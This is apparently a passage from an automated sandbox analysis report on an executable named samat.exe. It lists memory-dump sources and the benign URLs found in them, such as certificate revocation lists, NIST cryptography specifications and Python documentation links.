00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503522230.000001BCCC829000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503045992.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508302537.000001BCCC49D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500627948.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508607336.000001BCCC82A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025779747.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022845208.000001BCCC81D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC895000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022845208.000001BCCC7EF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://code.activestate.com/recipes/577916/
Source: samat.exe, 00000008.00000003.4518409392.000001BCCD348000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521907829.000001BCCD34D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4551934571.000001BCCA50A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: samat.exe, 00000008.00000002.4561597900.000001BCCCAEC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522921844.000001BCCC8C1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4537138300.000001BCCC8C6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: samat.exe, 00000008.00000003.4518409392.000001BCCD348000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521907829.000001BCCD34D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crlW
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crlO
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561540067.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC990000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530017261.000001BCCD41D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529696285.000001BCCC990000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: samat.exe, 00000008.00000003.4532754927.000001BCCC9FD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513874113.000001BCCC714000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518791762.000001BCCC718000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565419860.000001BCCDB6C000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4558325205.000001BCCC719000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565419860.000001BCCDB60000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509940106.000001BCCC711000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://docs.python.org/library/itertools.html#recipes
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://foo/bar.tar.gz
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://foo/bar.tgz
Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559388808.000001BCCC857000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/mail/
